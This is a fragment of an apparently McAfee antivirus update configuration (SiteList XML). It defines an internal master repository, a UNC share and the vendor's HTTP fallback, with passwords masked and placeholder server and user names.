<SpipeSite Type="master" Name="REPO1" Order="2" Enabled="1" Local="0" Server="servidor.dominio:8005" ServerName="servidor:8005" ServerIP="192.168.1.200:8005" Version="4.0.0"><RelativePath>Software</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password></SpipeSite>

<UNCSite Type="repository" Name="REPO2" Order="1" Server="servidor" Enabled="1" Local="0"><ShareName>Mad</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount><DomainName>*DOMINIO*</DomainName><UserName>usuario_epo</UserName><Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password></UNCSite>

<HttpSite Type="fallback" Name="REPO3" Order="3" Enabled="1" Local="0" Server="update.nai.com:80"><RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth><UserName>Anónimo</UserName><Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password></HttpSite>

</SiteList>
</ns:SiteLists>